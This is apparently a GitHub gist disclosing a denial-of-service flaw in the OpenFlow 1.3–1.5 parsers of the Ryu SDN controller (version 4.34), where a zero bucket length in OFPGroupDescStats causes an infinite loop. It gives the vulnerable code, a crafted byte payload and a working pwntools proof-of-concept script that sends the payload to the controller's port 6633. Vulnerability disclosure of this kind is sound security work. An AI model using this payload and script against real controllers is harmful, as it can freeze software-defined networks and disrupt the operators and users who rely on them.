Skip to content

Instantly share code, notes, and snippets.

@ErodedElk
Created April 9, 2024 17:15
Show Gist options
  • Save ErodedElk/f98d261fdba49f39aa58c7cb752a3063 to your computer and use it in GitHub Desktop.
Save ErodedElk/f98d261fdba49f39aa58c7cb752a3063 to your computer and use it in GitHub Desktop.
An issue was discovered in OFPGroupDescStats in parser.py in Faucet SDN Ryu version 4.34, allows remote attackers to cause a denial of service (DoS) (infinite loop).

in /ryu/ofproto/ofproto_v1_3_parser.py about line=4685

class OFPGroupDescStats(StringifyMixin):
    @classmethod
    def parser(cls, buf, offset):
    ....
        while length < stats.length:
            bucket = OFPBucket.parser(buf, offset)
            stats.buckets.append(bucket)

            offset += bucket.len
            length += bucket.len

If OFPBucket.len=0,the offset and length will no longer change and the parsing will fall into an infinite loop.

payload:

brk=b"\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00"
brk+=b"\x00\x28\x00\x00"
brk+=b"\x00\x00\x00\x00"
bucket="00000001ffffffffffffffff000000000000001000000001ffe5000000000000"
# brk+=bytes.fromhex(bucket)
brk+=bytes.fromhex(bucket)

poc:

from pwn import *
p=remote("0.0.0.0",6633)
brk=b"\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00"
brk+=b"\x00\x28\x00\x00"
brk+=b"\x00\x00\x00\x00"
bucket="00000001ffffffffffffffff000000000000001000000001ffe5000000000000"
# brk+=bytes.fromhex(bucket)
brk+=bytes.fromhex(bucket)
p.send(brk)
p.interactive()

This POC uses OFPGroupDescStatsReply as an example. The OFPGroupDescStatsReply message will be accompanied by an OFPGroupDescStats structure, in which the length of OFPBucket is tampered with to 0.

This problem also occurs with the following code:

/ryu/ofproto/ofproto_v1_3_parser.py about line=4685

/ryu/ofproto/ofproto_v1_4_parser.py about line=2548

/ryu/ofproto/ofproto_v1_5_parser.py about line=5893

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment